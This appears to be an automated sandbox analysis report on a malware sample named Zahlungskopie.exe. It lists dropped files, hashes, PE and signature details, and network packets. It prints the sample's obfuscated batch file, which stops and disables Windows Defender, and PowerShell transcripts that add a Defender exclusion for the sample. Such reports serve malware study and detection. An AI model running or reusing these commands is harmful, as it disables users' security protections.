Malicious: true
Reputation: high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 14734
Entropy (8bit): 4.996142136926143
Encrypted: false
SSDEEP: 384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
MD5: B7D3A4EB1F0AED131A6E0EDF1D3C0414
SHA1: A72E0DDE5F3083632B7242D2407658BCA3E54F29
SHA-256: 8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
SHA-512: F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
Malicious: false
Reputation: moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22324
Entropy (8bit): 5.602614110493615
Encrypted: false
SSDEEP: 384:gtCD+0YUCZADCFP4KnAjultIo3D7Y9g9SJUeRa1BMrmWZSRV7Oawrzy564I+Nzz:nyAY4KACltp339Xeh3AVHr
MD5: 1C5BB11EC1B1429F4BE5761C594581DE
SHA1: 96CF7F5DE649E0D86346F853FD2DDE77B0523A2A
SHA-256: 10D234AE62AEF17D77B5D284F89AC1517522269BA80A131379B94E88A75B45FB
SHA-512: 29B08B802FFFE1703AEAEEB5AF651A69879E98927D3064CBF61B50E00C45EA1C32AAD448CF5026FDFA6444946870A004DC2CC7A81FE652FF7659D0CD9EEA2185
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: @...e.....................2...........&.2............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):91000
                                                                                                                                                                                                                        Entropy (8bit):6.241345766746317
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                                                                                        MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                                                                                        SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                                                                                        SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: Purchase Order.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: Reversing Purchase Orders.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: NEW ORDERS 122020 2 x 40 HQ.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: ORDER01032021rfggfscan.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: FedEx's AWB#5305323204643.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: believehot23 cccc.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: order confirmation 6026022001.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: PROFORMA INVOICE.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: RFQ - REF 208056-pdf.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: DHL_document1102202068090891.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: em6eElVbOm.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: Purchase Order_Pdf.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: Fireman.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: NEW ORDER.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: payment confirmation 0029175112.exe, Detection: malicious
                                                                                                                                                                                                                        • Filename: Vrxs6evJO7.exe, Detection: malicious
                                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8399
                                                                                                                                                                                                                        Entropy (8bit):4.665734428420432
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                                                                                        MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                                                                                        SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                                                                                        SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                                                                                        SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qwedbya.jwe.psm1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kf03xesh.rdf.ps1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oivzv4c1.h2i.psm1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqe23g4a.ro0.ps1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\Documents\20210302\PowerShell_transcript.301389.OVizGZCQ.20210302200916.txt
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5797
                                                                                                                                                                                                                        Entropy (8bit):5.381074682720349
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:BZvj2NptqDo1ZQZsj2NptqDo1ZcR/JjZbj2NptqDo1Z9VQZZuZR:0OR5x
                                                                                                                                                                                                                        MD5:DDA723C89BED6423DA7090D77D9FD9F7
                                                                                                                                                                                                                        SHA1:2EF6A33FE2E76634D3DD50C127E069E8F257A705
                                                                                                                                                                                                                        SHA-256:B7E5CAABF6CAEEF5D8F99E91CEF44F3E13D67CB5563FDD916D80346C7B9DC3C7
                                                                                                                                                                                                                        SHA-512:C392C42A2F1239223C26E6C3EC6EC2FF7DA25C5AC45235CDBE4F894B57DB8971FCECB7D1DDC1397A9CDBD5CC953D46BF3BD3DF6DADD621D921154471D9B0CE26
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210302200935..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210302200936..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210302201724..Username: computer\user..RunAs User: computer\
                                                                                                                                                                                                                        C:\Users\user\Documents\20210302\PowerShell_transcript.301389.Qg0nbofL.20210302200918.txt
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5797
                                                                                                                                                                                                                        Entropy (8bit):5.381809413245628
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:BZrj2NqqDo1ZtZCj2NqqDo1ZuR/JjZsj2NqqDo1Z0QZZbZE:X
                                                                                                                                                                                                                        MD5:1EB29D52CC7A77F0DB44D60C8D798528
                                                                                                                                                                                                                        SHA1:CC9A83380C8AC7BD9EED49B75A692573D126274C
                                                                                                                                                                                                                        SHA-256:2F2CE840608BCAA6862CF4ECC034F456A33C87349A772942A6D5A9BCC70BA54F
                                                                                                                                                                                                                        SHA-512:C35AB13DFC98F64DDDAEF3604CAEBF67F1FA3E4292D980AAC6E261BD931D592A231CE685AA44FDF9AE32137B573CEB87B95394C8C2DA9BC505C729AFCC34C827
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210302200939..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..Process ID: 6884..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210302200939..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210302201537..Username: computer\user..RunAs User: computer\

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.030954981769071
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        File name:Zahlungskopie.exe
                                                                                                                                                                                                                        File size:29744
                                                                                                                                                                                                                        MD5:9615a1c5bc0707a4248b1f138b834c2e
                                                                                                                                                                                                                        SHA1:ff9de956805883e95f6c2e17690ed64093875f74
                                                                                                                                                                                                                        SHA256:09ed9ccee27444a684fb38f7137ab2328963596a5e679acee296210e0c1c15a1
                                                                                                                                                                                                                        SHA512:0370a78f2868d15a41946a89956a85a9efcfbeeef12aef0745d8052d14f10f9c4cb334cd674279d8839e1b29c6843aa6afc4ceee0ecf2f5ec5e9b83c272382a4
                                                                                                                                                                                                                        SSDEEP:768:0tshM4WBZuFjjxuA+fNNe/Esh20x2V1cpaFghr:0FBZAj0lf+cE2SIcpa2
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^............"...0..X...........v... ........@.. ...............................+....@................................

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x40769e
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                        Time Stamp:0x80B55EFB [Sat Jun 5 16:59:39 2038 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                        Signature Issuer:C=MRUnfymTgABlcbqHSrCcoaSr, S=McVSwPjbBStKV, L=NMhqFdxzmaw, T=elGjgPiQwGkXnuMTJwDoiHzDonstGufrDzacOjyQWOtc, E=JYpnZMkZnKZCdzNUcBj, OU=QnVSzRZnUxfhZteNDm, O=TOfWKxitJGWDFEcbYZCHM, CN=MovAhCGmTSAXghJXFIOFRNbAdbuG
                                                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                        • 3/1/2021 10:09:50 PM 3/1/2022 10:09:50 PM
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                        • C=MRUnfymTgABlcbqHSrCcoaSr, S=McVSwPjbBStKV, L=NMhqFdxzmaw, T=elGjgPiQwGkXnuMTJwDoiHzDonstGufrDzacOjyQWOtc, E=JYpnZMkZnKZCdzNUcBj, OU=QnVSzRZnUxfhZteNDm, O=TOfWKxitJGWDFEcbYZCHM, CN=MovAhCGmTSAXghJXFIOFRNbAdbuG
                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                        Thumbprint MD5:8E91EE92D8C46CBDDD6EC5F516EA7572
                                                                                                                                                                                                                        Thumbprint SHA-1:84016644B7C78D56A2EA24DD0015CB5AFA45C7D1
                                                                                                                                                                                                                        Thumbprint SHA-256:8875CAA77FF77F78538385F9F28B5614114B87DDC810B62AFB6F715572B2214D
                                                                                                                                                                                                                        Serial:1A4ED61549096655F37512FF8DC43759

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7648           0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x400         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x6000           0x1430        .text
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x56a4        0x5800    False     0.558638139205   data       5.7214574865     IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8000           0x400         0x400     False     0.443359375      data       3.38499918978    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name        RVA     Size   Type  Language  Country
RT_VERSION  0x8058  0x3a8  data  English   United States

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
LegalCopyright    2019 get_Hostname
Assembly Version  3.5.6.6
InternalName      CheckValidity.exe
FileVersion       6.8.8.0
CompanyName       IAssemblyRequestEntry
LegalTrademarks   get_Hand
Comments          set_DropDownDirection
ProductName       CheckValidity
ProductVersion    3.5.6.6
FileDescription   KerbLogonSubmitType
OriginalFilename  CheckValidity.exe
Translation       0x0409 0x0514

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Mar 2, 2021 20:08:50.639194965 CET  49719        80         192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.681123972 CET  80           49719      151.101.2.133  192.168.2.4
Mar 2, 2021 20:08:50.681313992 CET  49719        80         192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.681927919 CET  49719        80         192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.722511053 CET  80           49719      151.101.2.133  192.168.2.4
Mar 2, 2021 20:08:50.722868919 CET  80           49719      151.101.2.133  192.168.2.4
Mar 2, 2021 20:08:50.722882032 CET  80           49719      151.101.2.133  192.168.2.4
Mar 2, 2021 20:08:50.722994089 CET  49719        80         192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.724277020 CET  49719        80         192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.764724016 CET  80           49719      151.101.2.133  192.168.2.4
Mar 2, 2021 20:08:50.841211081 CET  49720        443        192.168.2.4    151.101.2.133
Mar 2, 2021 20:08:50.881768942 CET  443          49720      151.101.2.133  192.168.2.4
